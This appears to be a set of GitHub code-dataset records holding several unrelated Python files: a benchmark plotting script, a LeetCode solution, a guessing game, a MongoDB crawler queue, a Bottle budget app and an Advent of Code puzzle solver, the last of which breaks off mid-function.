'bcsr_ref_map': '',\n 'bcsr_omp_stp': 'OMP1',\n 'bcsr_omp_map': 'OMP1',\n 'bcsr_omp_rdx': 'OMP2',\n 'bcsr_mpi_stp': 'MPI1',\n 'bcsr_mpi_map': 'MPI1',\n 'bcsr_mpi_rdx': 'MPI2',\n 'pcsr_mpi_map': 'MPI3',\n 'pcsr_mpi_stp': 'MPI3',\n 'bcsr_spu_stp': 'SPU1',\n 'bcsr_spu_map': 'SPU1',\n 'bcsr_spu_rdx': 'SPU2',\n 'bcsr_spu2_stp': 'SPU1_2',\n 'bcsr_spu2_map': 'SPU1_2',\n 'bcsr_spu2_rdx': 'SPU2_2',\n 'bcsr_ocl_mix': '',\n 'bcsr_ocl_stp': 'OCL1',\n 'bcsr_ocl_map': 'OCL1',\n 'bcsr_ocl_wrp': 'OCL2',\n 'bcsr_cud_mix': '',\n 'bcsr_cud_stp': 'CUD1',\n 'bcsr_cud_map': 'CUD1',\n 'bcsr_cud_wrp': 'CUD2',\n 'bcsr_cud_dyn': 'CUD3',\n\n 'csc_omp_bin': 'OMP3',\n 'csc_mkl_lib': 'MKL',\n 'csc_cud_lib': 'CSP',\n\n 'bcsc_ref_def': '',\n 'bcsc_ref_stp': '',\n 'bcsc_ref_map': '',\n 'bcsc_omp_stp': 'OMP1',\n 'bcsc_omp_map': 'OMP1',\n 'bcsc_omp_rdx': 'OMP2',\n 'bcsc_mpi_stp': 'MPI1',\n 'bcsc_mpi_map': 'MPI1',\n 'bcsc_mpi_rdx': 'MPI2',\n 'pcsc_mpi_map': 'MPI3',\n 'pcsc_mpi_stp': 'MPI3',\n 'bcsc_spu_stp': 'SPU1',\n 'bcsc_spu_map': 'SPU1',\n 'bcsc_spu_rdx': 'SPU2',\n 'bcsc_spu2_stp': 'SPU1_2',\n 'bcsc_spu2_map': 'SPU1_2',\n 'bcsc_spu2_rdx': 'SPU2_2',\n 'bcsc_ocl_mix': '',\n 'bcsc_ocl_stp': 'OCL1',\n 'bcsc_ocl_map': 'OCL1',\n 'bcsc_ocl_wrp': 'OCL2',\n 'bcsc_cud_mix': '',\n 'bcsc_cud_stp': 'CUD1',\n 'bcsc_cud_map': 'CUD1',\n 'bcsc_cud_wrp': 'CUD2',\n 'bcsc_cud_dyn': 'CUD3',\n\n 'rndpcsr_mpi_stp': 'MPI3$_{rand}$',\n 'blkpcsr_mpi_stp': 'MPI3$_{block}$',\n 'rndpcsc_mpi_stp': 'MPI3$_{rand}$',\n 'blkpcsc_mpi_stp': 'MPI3$_{block}$',\n}\n\ndevice = {\n 'OMP1': 'CPU',\n 'OMP2': 'CPU',\n 'OMP3': 'CPU',\n 'MKL': 'CPU',\n 'OCL1': 'GPU',\n 'OCL2': 'GPU',\n 'CUD1': 'GPU',\n 'CUD2': 'GPU',\n 'CUD3': 'GPU',\n 'CSP': 'GPU',\n 'SPU1': 'CPU+GPU',\n 'SPU2': 'CPU+GPU',\n 'SPU1_2': 'CPU+GPU',\n 'SPU2_2': 'CPU+GPU',\n 'MPI1': 'CPUs',\n 'MPI2': 'CPUs',\n 'MPI3': 'CPUs',\n}\n\nflows = {\n 'row': 'push',\n 'csr': 'push',\n 'bcsr': 'push',\n 'pcsr': 'push',\n 'col': 'pull',\n 'csc': 'pull',\n 'bcsc': 'pull',\n 'pcsc': 'pull',\n\n 'rndpcsr': 'push',\n 'blkpcsr': 'push',\n 'rndpcsc': 'pull',\n 'blkpcsc': 'pull',\n}\n\ngraphs = {\n 'europe_osm': 'OSM',\n 'hugebubbles-00020': 'BUB',\n 'cit-Patents': 'CIT',\n 'wb-edu': 'EDU',\n 'wikipedia-20070206': 'WIKI',\n 'as-Skitter': 'AS',\n 'soc-LiveJournal1': 'SOC',\n 
'arabic-2005': 'WWW',\n 'coPapersCiteseer': 'COL',\n 'hollywood-2009': 'HOL',\n 'regular': 'REG',\n 'regular_stride': 'REG (stride dst)',\n 'regular_stride_sd': 'REG (stride src+dst)',\n 'erdos_renyi': 'ER',\n 'triangular_erdos_renyi': 'TER',\n 'trans_powerlaw' : 'PA',\n 'kronecker': 'KRO'\n}\n\ngraph_types = {\n 'OSM': 'real-world',\n 'BUB': 'real-world',\n 'CIT': 'real-world',\n 'EDU': 'real-world',\n 'WIKI': 'real-world',\n 'AS': 'real-world',\n 'SOC': 'real-world',\n 'WWW': 'real-world',\n 'COL': 'real-world',\n 'HOL': 'real-world',\n 'REG': 'synthetic',\n 'ER': 'synthetic',\n 'TER': 'synthetic',\n 'PA': 'synthetic',\n 'KRO': 'synthetic',\n 'REG (stride dst)': 'synthetic',\n 'REG (stride src+dst)': 'synthetic',\n}\n\nmarkers = {\n 'OMP1': ('light blue', 'o'),\n 'OMP2': ('light blue', 'D'),\n 'OMP3': ('light blue', '^'),\n 'MKL': ('light blue', '*'),\n 'OCL1': ('light red', 'o'),\n 'OCL2': ('light red', 'v'),\n 'CUD1': ('light red', 'o'),\n 'CUD2': ('light red', 'v'),\n 'CUD3': ('light red', '^'),\n 'CSP': ('light red', '*'),\n\n 'OSM': ('light blue', 'o'),\n 'BUB': ('light blue', 'o'),\n 'CIT': ('light blue', 'o'),\n 'EDU': ('light blue', 'o'),\n 'WIKI': ('light blue', 'o'),\n 'AS': ('light blue', 'o'),\n 'SOC': ('light blue', 'o'),\n 'WWW': ('light blue', 'o'),\n 'COL': ('light blue', 'o'),\n 'HOL': ('light blue', 'o'),\n\n 'REG': ('blue', 'o'),\n 'ER': ('green', '^'),\n 'TER': ('cyan', 'v'),\n 'PA': ('magenta', 's'),\n 'KRO': ('yellow', 'D'),\n\n 'bcsc_ref_def': ('light tan', '*'),\n 'bcsc_ref_map': ('light tan', 's'),\n 'bcsc_ref_stp': ('light tan', 'o'),\n 'bcsc_omp_def': ('light blue', '*'),\n 'bcsc_omp_map': ('light blue', 's'),\n 'bcsc_omp_rdx': ('light blue', 'D'),\n 'bcsc_omp_stp': ('light blue', 'o'),\n 'bcsc_mpi_def': ('light olive', '*'),\n 'bcsc_mpi_map': ('light olive', 's'),\n 'bcsc_mpi_rdx': ('light olive', 'D'),\n 'bcsc_mpi_stp': ('light olive', 'o'),\n 'pcsc_mpi_def': ('light teal', '*'),\n 'pcsc_mpi_map': ('light teal', 's'),\n 'pcsc_mpi_stp': ('light teal', 'o'),\n 'bcsc_spu_map': ('light green', 's'),\n 'bcsc_spu_rdx': ('light green', 'D'),\n 'bcsc_spu_stp': ('light green', 'o'),\n 'bcsc_ocl_map': ('light purple', 's'),\n 'bcsc_ocl_mix': ('light purple', '+'),\n 'bcsc_ocl_stp': ('light purple', 'o'),\n 'bcsc_ocl_wrp': ('light purple', 'v'),\n 'bcsc_cud_map': ('light red', 's'),\n 'bcsc_cud_mix': ('light red', '+'),\n 'bcsc_cud_stp': ('light red', 'o'),\n 'bcsc_cud_wrp': ('light red', 'v'),\n 'bcsc_cud_dyn': ('light red', '^'),\n\n 'kern_rank_cpu_lib_col': ('light blue', '*'),\n 'kern_rank_omp_def_col': ('light blue', '*'),\n 'kern_rank_omp_map_col': ('light blue', 's'),\n 'kern_rank_omp_stp_col': ('light blue', 'o'),\n 'kern_rank_omp_bin_col': ('light blue', '^'),\n 'kern_rank_ocl_def_col': ('light purple', 's'),\n 'kern_rank_ocl_stp_col': ('light purple', 'o'),\n 'kern_rank_ocl_wrp_col': ('light purple', 'v'),\n 'kern_rank_cud_def_col': ('light red', 's'),\n 'kern_rank_cud_stp_col': ('light red', 'o'),\n 'kern_rank_cud_wrp_col': ('light red', 'v'),\n 'kern_rank_cud_dyn_col': ('light red', '^'),\n 'kern_rank_cud_lib_col': ('light red', '*'),\n\n 'bcsr_ref_def': ('dark tan', '*'),\n 'bcsr_ref_map': ('dark tan', 's'),\n 'bcsr_ref_stp': ('dark tan', 'o'),\n 'bcsr_omp_def': ('dark blue', '*'),\n 'bcsr_omp_map': ('dark blue', 's'),\n 'bcsr_omp_rdx': ('dark blue', 'D'),\n 'bcsr_omp_stp': ('dark blue', 'o'),\n 'bcsr_mpi_def': ('dark olive', '*'),\n 'bcsr_mpi_map': ('dark olive', 's'),\n 'bcsr_mpi_rdx': ('dark olive', 'D'),\n 'bcsr_mpi_stp': ('dark olive', 'o'),\n 
'pcsr_mpi_def': ('dark teal', '*'),\n 'pcsr_mpi_map': ('dark teal', 's'),\n 'pcsr_mpi_stp': ('dark teal', 'o'),\n 'bcsr_spu_map': ('dark green', 's'),\n 'bcsr_spu_rdx': ('dark green', 'D'),\n 'bcsr_spu_stp': ('dark green', 'o'),\n 'bcsr_ocl_map': ('dark purple', 's'),\n 'bcsr_ocl_mix': ('dark purple', '+'),\n 'bcsr_ocl_stp': ('dark purple', 'o'),\n 'bcsr_ocl_wrp': ('dark purple', 'v'),\n 'bcsr_cud_map': ('dark red', 's'),\n 'bcsr_cud_mix': ('dark red', '+'),\n 'bcsr_cud_stp': ('dark red', 'o'),\n 'bcsr_cud_wrp': ('dark red', 'v'),\n 'bcsr_cud_dyn': ('dark red', '^'),\n\n 'kern_rank_cpu_lib_row': ('dark blue', '*'),\n 'kern_rank_omp_def_row': ('dark blue', '*'),\n 'kern_rank_omp_map_row': ('dark blue', 's'),\n 'kern_rank_omp_stp_row': ('dark blue', 'o'),\n 'kern_rank_omp_bin_row': ('dark blue', '^'),\n 'kern_rank_ocl_def_row': ('dark purple', 's'),\n 'kern_rank_ocl_stp_row': ('dark purple', 'o'),\n 'kern_rank_ocl_wrp_row': ('dark purple', 'v'),\n 'kern_rank_cud_def_row': ('dark red', 's'),\n 'kern_rank_cud_stp_row': ('dark red', 'o'),\n 'kern_rank_cud_wrp_row': ('dark red', 'v'),\n 'kern_rank_cud_dyn_row': ('dark red', '^'),\n 'kern_rank_cud_lib_row': ('dark red', '*'),\n}\n\nfw_order = ['ref', 'omp', 'mpi', 'spu', 'spu2', 'ocl', 'cud']\n\ncolours = {colour: itertools.cycle(sns.light_palette(colour, len(list(count))+2, input='xkcd')[1:-1]) for colour, count in itertools.groupby(sorted(m[0] for m in markers.values()))}\nmarkers = {f: (tuple(next(colours[c])), m) for f, (c, m) in sorted(markers.items())}\n\ndef filter_markers(filter):\n global markers\n if isinstance(filter, str):\n r = re.compile(filter)\n markers = {key: val for key, val in markers.items() if r.search(key) is not None}\n elif (filter is not None):\n filter = set(filter)\n markers = {key: val for key, val in markers.items() if key in filter}\n\ndef get_name(fname, part, parts):\n if parts > 1:\n fname = fname.rsplit('.', 1)\n fname = fname[0] + ('.p%d_%d' % (parts, part)) + ((len(fname) > 1 and '.'+fname[1]) or '')\n return fname\n\ndef get_deg(fname):\n if fname == '-':\n input = sys.stdin\n elif fname.endswith('.deg'):\n input = fname\n elif os.path.isfile(fname + '.deg'):\n input = fname + '.deg'\n else:\n input = subprocess.Popen(['%s/../bin/graphdeg' % os.path.dirname(os.path.abspath(__file__)), '-mOUT', fname], stdout=subprocess.PIPE).stdout\n return np.loadtxt(input, dtype=np.int32, ndmin=1)\n\ndef get_hist(fname):\n if fname.endswith('.hist'):\n input = fname\n elif os.path.isfile(fname + '.hist'):\n input = fname + '.hist'\n else:\n return np.bincount(get_deg(fname))\n return np.loadtxt(input, dtype=np.int32, ndmin=1)\n\ndef get_heat(fname):\n if fname == '-':\n input = sys.stdin\n elif fname.endswith('.heat'):\n input = fname\n elif os.path.isfile(fname + '.heat'):\n input = fname + '.heat'\n else:\n input = subprocess.Popen(['%s/../bin/graphheat' % os.path.dirname(os.path.abspath(__file__)), '-b32', fname], stdout=subprocess.PIPE).stdout\n heat = np.loadtxt(input, dtype=np.single, ndmin=1)\n return np.reshape(heat, (-1, int(math.sqrt(heat.size))))\n\ndef get_log(fname, filter = None):\n data = pd.read_csv(fname, delim_whitespace=True, comment='#')\n\n if (filter is not None):\n data = data[data['SOLVER'].str.contains(filter)]\n\n data = data.groupby(['DATASET', '|B|', 'it', 'SOLVER'], as_index=False).mean()\n\n data['all'] = 1\n data['DATAGROUP'] = data['DATASET'].str.extract('(.+?)(?:_s\\\\d+\\\\w*)?(?:_\\\\d+\\\\w*_\\\\d+\\\\w*)?\\\\.(?:[^.]+).el_gz')\n data['FRAMEWORK'] = 
data['SOLVER'].str.extract('(?:kern_)?[^_]+_([^_]+)')\n data['METHOD'] = data['SOLVER'].str.extract('(?:kern_)?[^_]+_[^_]+_([^_]+)')\n data['FLOW'] = data['SOLVER'].str.extract('((?:^.*(?:cs[rc]))|(?:(?:row|col)$))')\n data['FLOW'] = data['FLOW'].map(flows)\n data['kernel'] = data['SOLVER'].map(kernels)\n data['graph'] = data['DATAGROUP'].map(graphs)\n data['dataset'] = data['graph'].map(graph_types)\n data['device'] = data['kernel'].map(device)\n\n data['DATAGROUP'] += data.groupby(['DATAGROUP'])['DATASET'].transform('nunique').map(' ({0})'.format)\n data['FRAMEWORK'] += data.groupby(['FRAMEWORK'])['SOLVER'].transform('nunique').map(' ({0})'.format)\n data['METHOD'] += data.groupby(['METHOD'])['SOLVER'].transform('nunique').map(' ({0})'.format)\n\n data['time/it'] = data['time_ms'] / data['it']\n data['|E|/sec'] = data['|E|'] / (data['time/it'] / 1000)\n # data['EPS'] = (data['|E|'] / (data['rank_us'] / 1e6)) / 1e9\n data['EPS'] = (data['|E|'] / (data['time/it'] / 1e3)) / 1e9\n # data['PS'] = ((data['|V|'] + data['|E|']) / (data['rank_us'] / 1e6)) / 1e9\n data['PS'] = ((data['|V|'] + data['|E|']) / (data['time/it'] / 1e3)) / 1e9\n data['$\\overline{D}$'] = data['|E|'] / data['|V|']\n\n return data\n\ndef merge_stats(fname, log):\n stats = pd.read_csv(fname, delim_whitespace=True, comment='#')\n stats = stats.drop(columns=['|V|', '|E|'])\n stats = stats.groupby(['DATASET'], as_index=False).mean()\n\n return pd.merge(log, stats, on='DATASET', how='left')","repo_name":"nielsAD/hgb","sub_path":"scripts/plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":12990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"6914537690","text":"\"\"\"\nLeetCode :: April 2022 Challenge :: 1260. Shift 2D Grid\njramaswami\n\"\"\"\n\n\nclass Solution:\n\n def shiftGrid(self, grid, k):\n rows = len(grid)\n cols = len(grid[0])\n cells = rows * cols\n for _ in range(k):\n last = grid[-1][-1]\n for i in range(cells-1, 0, -1):\n r, c = divmod(i, cols)\n r0, c0 = divmod(i - 1, cols)\n grid[r][c] = grid[r0][c0]\n grid[0][0] = last\n return grid\n\n\ndef test_1():\n grid = [[1,2,3],[4,5,6],[7,8,9]]\n k = 1\n expected = [[9,1,2],[3,4,5],[6,7,8]]\n assert Solution().shiftGrid(grid, k) == expected\n\n\ndef test_2():\n grid = [[1,2,3],[4,5,6],[7,8,9]]\n k = 9\n expected = [[1,2,3],[4,5,6],[7,8,9]]\n assert Solution().shiftGrid(grid, k) == expected\n","repo_name":"jramaswami/LeetCode_Python","sub_path":"shift_2d_grid.py","file_name":"shift_2d_grid.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"15115532708","text":"import random\nnumber = random.randint(1,9)\nchances = 0\n\nwhile chances<5:\n guess = input(\"Enter you guess: \")\n if guess == number:\n print(\"Congrats you won!\")\n break\n elif guess < number:\n print(\"Guess is too low. Guess a higher number\",guess)\n else:\n print(\"Guess is too high. Guess a lower number\", guess)\n \n","repo_name":"OmGautam/GuessingGame","sub_path":"guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"508733179","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n#http://cuiqingcai.com/3363.html\n\n__author__ = 'Demi Yu'\n\nfrom datetime import datetime, timedelta\nfrom pymongo import MongoClient, errors\n\n\nclass MogoQueue():\n OUTSTANDING = 1 ##初始状态\n PROCESSING = 2 ##正在下载状态\n COMPLETE = 3 ##下载完成状态\n\n def __init__(self, db, collection, timeout=300): ##初始mongodb连接\n self.client = MongoClient()\n self.Client = self.client[db]\n self.db = self.Client[collection]\n self.timeout = timeout\n\n def __bool__(self):\n \"\"\"\n 这个函数,我的理解是如果下面的表达为真,则整个类为真\n 至于有什么用,后面我会注明的(如果我的理解有误,请指点出来谢谢,我也是Python新手)\n $ne的意思是不匹配\n \"\"\"\n record = self.db.find_one(\n {'status': {'$ne': self.COMPLETE}}\n )\n return True if record else False\n\n def push(self, url, title): ##这个函数用来添加新的URL进队列\n try:\n self.db.insert({'_id': url, 'status': self.OUTSTANDING, '主题': title})\n print(url, '插入队列成功')\n except errors.DuplicateKeyError as e: ##报错则代表已经存在于队列之中了\n print(url, '已经存在于队列中了')\n pass\n\n def push_imgurl(self, title, url):\n try:\n self.db.insert({'_id': title, 'statue': self.OUTSTANDING, 'url': url})\n print('图片地址插入成功')\n except errors.DuplicateKeyError as e:\n print('地址已经存在了')\n pass\n\n def pop(self):\n \"\"\"\n 这个函数会查询队列中的所有状态为OUTSTANDING的值,\n 更改状态,(query后面是查询)(update后面是更新)\n 并返回_id(就是我们的URL),MongDB好使吧,^_^\n 如果没有OUTSTANDING的值则调用repair()函数重置所有超时的状态为OUTSTANDING,\n $set是设置的意思,和MySQL的set语法一个意思\n \"\"\"\n record = self.db.find_and_modify(\n query={'status': self.OUTSTANDING},\n update={'$set': {'status': self.PROCESSING, 'timestamp': datetime.now()}}\n )\n if record:\n return record['_id']\n else:\n self.repair()\n raise KeyError\n\n def pop_title(self, url):\n record = self.db.find_one({'_id': url})\n return record['主题']\n\n def peek(self):\n \"\"\"这个函数是取出状态为 OUTSTANDING的文档并返回_id(URL)\"\"\"\n record = self.db.find_one({'status': self.OUTSTANDING})\n if record:\n return record['_id']\n\n def complete(self, url):\n \"\"\"这个函数是更新已完成的URL完成\"\"\"\n self.db.update({'_id': url}, {'$set': {'status': self.COMPLETE}})\n\n def repair(self):\n \"\"\"这个函数是重置状态$lt是比较\"\"\"\n record = self.db.find_and_modify(\n query={\n 'timestamp': {'$lt': datetime.now() - timedelta(seconds=self.timeout)},\n 'status': {'$ne': self.COMPLETE}\n },\n update={'$set': {'status': self.OUTSTANDING}}\n )\n if record:\n print('重置URL状态', record['_id'])\n\n def clear(self):\n \"\"\"这个函数只有第一次才调用、后续不要调用、因为这是删库啊!\"\"\"\n self.db.drop()","repo_name":"YuHongJun/python-training","sub_path":"work_two_Crawler/catch_mongodb_queue.py","file_name":"catch_mongodb_queue.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"2"}
+{"seq_id":"12163322263","text":"from time import sleep\nfrom utils import Request\n\n\nclass Controller:\n\n def __init__(self, service):\n self.service = service\n\n def handle_wait(self):\n sleep(20)\n return 'Hello there', 200\n\n def handle_get(self, file_name):\n service_responce = self.service.get(Request('GET', key=file_name))\n if service_responce.is_successful:\n return service_responce.data, 200\n else:\n return '', 404\n\n def handle_put(self, flask_request, file_name, data):\n if not self.validate(flask_request):\n return '', 400\n service_responce = self.service.put(\n Request('PUT', key=file_name, data=data))\n if service_responce.is_successful:\n return '', 201\n\n def handle_delete(self, file_name):\n service_responce = self.service.delete(\n Request('DELETE', key=file_name))\n if service_responce.is_successful:\n return '', 204\n\n def validate(self, request):\n if request.method == 'PUT' and \\\n request.headers.get('Content-Type') != 'application/json':\n return False\n return True\n","repo_name":"ElectricR/WebServer","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"25465549809","text":"#!/usr/bin/python3.6\nimport fileinput, sys, collections\nimport sync as f\n\nsub1 = fileinput.input(sys.argv[1])\nsub2 = fileinput.input(sys.argv[2])\norder1 = f.createDicNamesOrder(sub1)\norder2 = f.createDicNamesOrder(sub2)\nsub1 = fileinput.input(sys.argv[1])\nsub2 = fileinput.input(sys.argv[2])\ndic1= f.createDicTextTime(sub1)\ndic2= f.createDicTextTime(sub2)\n\ninter1,inter2 = f.intersectDicts(order1,order2)\n\nset1 = set(dic1)\nset2 = set(dic2)\n\ndicTrans = {}\nmin1 = int(min(inter1))\nmin2 = int(min(inter2))\nind = min(min1,min2)\n\nif min1 <= min2:\n\tinteraux = inter1 \nelse:\n\tinteraux = inter2\nsetaux= sorted(set(interaux),reverse=True)\nprint(setaux)\nind=setaux.pop()\n\n# o dicionario é tempo: legenda\nfor n in set1.intersection(set2):\n\t\n\tif n == ind:\n\t\tif len(setaux) != 0:\n\t\t\tind=setaux.pop()\n\t\telse:\n\t\t\tind=-1\n\t\tline = \"LINHA ALTERADA\\n\"\n\t\tfor i in dic1[n]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"---> \" \n\t\tfor i in dic2[interaux[n][0]]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"\\n\"\n\t\tline.replace(\" \", \"\")\n\t\tdicTrans.update({n : line})\n\telse:\t\t\n\t\tline = \"\"\n\t\tfor i in dic1[n]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"---> \" \n\t\tfor i in dic2[n]:\n\t\t\tline = line + \"\".join(str(i).replace(\"\\n\", \" \"))\n\t\tline = line + \"\\n\"\n\t\tline.replace(\" \", \"\")\n\t\tdicTrans.update({n : line})\n\n#para ordenar o dicionario pelo \"tempo\"\nod = collections.OrderedDict(sorted(dicTrans.items()))\n\n# vamos colocar o dicionario numLegenda:legenda\nnumSub = 1\n\n# e vamos colocar este dicionario n\n\nfor i in od:\n\tprint(str(numSub) + \":\\n\", od[i])\n\tnumSub +=1\n\n\n#line= str(numSub) + \"\\n\"\n\t#numSub +=1","repo_name":"Alfredogomes/SPLN","sub_path":"trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"36823318916","text":"import os\nimport pickle\n\nimport torch\nimport pandas as pd\nfrom torch.utils.data import Dataset, Subset, DataLoader\n\nclass EquivalenceTestDataset(Dataset):\n def __init__(self, annotations_file, fa_dir, fa_transform=None, target_trasform=None):\n self.fa_labels = pd.read_csv(annotations_file, names=[\"fa_1\", \"fa_2\", \"label\"])\n self.fa_dir = fa_dir\n self.fa_transform = fa_transform\n self.target_transform = target_trasform\n \n def __len__(self):\n return len(self.fa_labels)\n \n def __getitem__(self, idx):\n if isinstance(idx, torch.Tensor):\n idx = idx.tolist()\n fa_path_1 = os.path.join(self.fa_dir, self.fa_labels.iloc[idx, 0])\n with open(fa_path_1, \"rb\") as fp:\n fa_1 = pickle.load(fp)\n fa_path_2 = os.path.join(self.fa_dir, self.fa_labels.iloc[idx, 1])\n with open(fa_path_2, \"rb\") as fp:\n fa_2 = pickle.load(fp)\n label = self.fa_labels.iloc[idx, 2]\n if self.fa_transform:\n fa_1 = self.fa_transform(fa_1)\n fa_2 = self.fa_transform(fa_2)\n if self.target_transform:\n label = self.target_transform(label)\n return fa_1, fa_2, label\n\ndef test_transform(gfa):\n lst = [int(x) for x in gfa.States]\n return torch.Tensor(lst)\n\nTRAINING_DATA_SIZE = 80_000\nequivalence_test_data = EquivalenceTestDataset(\"./equivalence_test_data/annotations_file.csv\", \"./equivalence_test_data/\", fa_transform=test_transform)\n\ntrain_data = Subset(equivalence_test_data, torch.arange(TRAINING_DATA_SIZE))\ntest_data = Subset(equivalence_test_data, torch.arange(TRAINING_DATA_SIZE, len(equivalence_test_data)))\n\ntrain = DataLoader(train_data, batch_size=6, shuffle=False)\ntest = DataLoader(test_data, batch_size=6, shuffle=False)\n\nfor fa_1, fa_2, label in train:\n print(fa_1, fa_2, label)\n exit()\n","repo_name":"mrseongminkim/SHORT","sub_path":"utils/equivalence_test_dataset.py","file_name":"equivalence_test_dataset.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31060233237","text":"\"\"\"\nRoutes and views for the bottle application.\n\"\"\"\n\nfrom bottle import route, view, run, template, request, static_file, error,get,post\nfrom datetime import datetime\nimport sqlite3\nimport codecs \nimport os \nimport sys \n\n@route('/')\n@route('/home')\n@view('index')\ndef home():\n \"\"\"Renders the home page.\"\"\"\n return dict(\n year=datetime.now().year\n )\n\n@route('/list')\n@view('list')\ndef list():\n con = sqlite3.connect(\"receipts.sqlite\")\n c = con.cursor()\n c.execute(\"\"\"\n select id,store,category,item,quantity,ui,'$' || cast(cost as float) as cost,purchasedate from receipts\n \"\"\")\n result = c.fetchall()\n output = template(\"list\",rows = result)\n return output\n\n@route(\"/budget\")\ndef budget():\n\tcon = sqlite3.connect(\"receipts.sqlite\")\n\tc = con.cursor()\n\tc.execute(\"\"\"\n\tselect distinct '$' || cast(amount as float) as 'amount', date(budgetdate) as 'DateSet','$' || r.cost as 'ExpensesTotal','$' || cast((x.budget - r.cost) as float) as 'WhatsLleft'\n from budget b,\n (select sum(cost)cost from receipts where purchasedate >= (select max(date(budgetdate)) from budget))r,\n\t(select distinct amount as budget,id from budget where id in (\n\tselect max(id) from budget))x\n\twhere b.id in (\n\tselect max(id) from budget) \n\torder by b.budgetdate desc\t\n\t\"\"\")\n\tresult = c.fetchall()\t\n\toutput = template(\"budget\",rows = result)\n\treturn output\n\n@route(\"/new\",method = \"GET\")\ndef new_item():\n\tif request.GET.get(\"save\",\"\").strip():\n\t\tnewStore = request.GET.get(\"store\",\"\").strip()\n\t\tnewCategory = request.GET.get(\"category\",\"\").strip()\n\t\tnewItem = request.GET.get(\"item\",\"\").strip()\n\t\tnewQuantity = request.GET.get(\"quantity\",\"\").strip()\n\t\tnewUi = request.GET.get(\"ui\",\"\").strip()\n\t\tnewCost = request.GET.get(\"cost\",\"\").strip()\n\t\tnewPurchasedate = request.GET.get(\"purchasedate\",\"\").strip()\n\t\tcon = sqlite3.connect(\"receipts.sqlite\")\n\t\tc = con.cursor()\n\t\tc.execute(\"\"\"\n\t\tinsert into receipts(store,category,item,quantity,ui,cost,purchasedate)values(?,?,?,?,?,?,?)\"\"\",(newStore,newCategory,newItem,newQuantity,newUi,newCost,newPurchasedate,))\n\t\tnew_id = c.lastrowid \n\t\tcon.commit()\n\t\tc.close()\n\t\turl = \"http://localhost:5555/list\"\n\t\treturn\"The new receipt was inserted into the database, the ID is {0}
List
New Expense
\".format(new_id)\n\telse:\n\t\treturn template(\"new_receipt.tpl\")\n\n@route(\"/newbudget\",method = \"GET\")\ndef new_budget():\n\tif request.GET.get(\"update\",\"\").strip():\n\t\tnewAmount = request.GET.get(\"amount\",\"\").strip()\n\t\tcon = sqlite3.connect(\"receipts.sqlite\")\n\t\tc = con.cursor()\n\t\tc.execute(\"\"\"\n\t\tinsert into budget(amount)values(?)\"\"\",(newAmount,))\n\t\tnew_id = c.lastrowid \n\t\tcon.commit()\n\t\tc.close()\n\t\treturn\"The new budget amount was inserted into the database, the ID is {0}
Budget\".format(new_id)\n\telse: \n\t\treturn template(\"new_budget.tpl\")","repo_name":"devichs/BudgetApp","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"74132058287","text":"import aoc\nimport re\nimport colorama\n\ndef main(input_blob):\n tile_dict = {}\n for raw_tile in input_blob.split(\"\\n\\n\"):\n lines = raw_tile.splitlines()\n tile_dict[lines[0].split()[1].replace(\":\", \"\")] = lines[1:]\n\n assembled_grid, tile_positions = assemble(tile_dict)\n \n min_x = min([x for x, y in tile_positions.keys()])\n max_x = max([x for x, y in tile_positions.keys()])\n min_y = min([y for x, y in tile_positions.keys()])\n max_y = max([y for x, y in tile_positions.keys()])\n part1 = int(tile_positions[(min_x, min_y)]) * int(tile_positions[(max_x, min_y)]) * int(tile_positions[(min_x, max_y)]) * int(tile_positions[(max_x, max_y)])\n\n for _ in range(4):\n for flipping in [False, True]:\n found, roughness = find_sea_monsters(assembled_grid)\n if found:\n part2 = roughness\n break\n if flipping:\n assembled_grid = flip(assembled_grid, True)\n else:\n assembled_grid = rotate(assembled_grid, 1)\n \n #print_grid(assembled_grid)\n\n return part1, part2\n\ndef get_edges(tile):\n \"\"\"0->up, 1->left, 2->down, 3->right\"\"\"\n\n edges = []\n edges.append(tile[0])\n edges.append(\"\".join([tile[i][0] for i in range(0, len(tile))])[::-1])\n edges.append(tile[-1][::-1])\n edges.append(\"\".join([tile[i][-1] for i in range(0, len(tile))]))\n\n return edges\n\ndef rotate(tile, rotation):\n \"\"\"rotation: 0->default, 1->90deg ccw, 2->180deg ccw, 3->270deg ccw\"\"\"\n\n for _ in range(rotation):\n new_tile = []\n for column in range(len(tile[0])):\n new_tile.append(\"\".join([tile[i][len(tile[0]) - column - 1] for i in range(len(tile))]))\n tile = new_tile\n return tile\n\ndef flip(tile, horizontal):\n if horizontal:\n new_tile = []\n for line in tile:\n new_tile.append(line[::-1])\n else:\n new_tile = tile[::-1]\n return new_tile\n\ndef assemble(tile_dict):\n start_tile_id = list(tile_dict.keys())[0]\n direction_dict = {0: (0, -1), 1: (-1, 0), 2: (0, 1), 3: (1, 0)}\n\n # key=position, value=tile_id\n tile_positions = {}\n tile_positions[(0, 0)] = start_tile_id\n open_set = set()\n open_set.add((0, 0))\n while open_set:\n current_position = open_set.pop()\n current_tile_id = tile_positions[current_position]\n current_edges = get_edges(tile_dict[current_tile_id])\n for other_id, other_tile in tile_dict.items():\n if other_id in 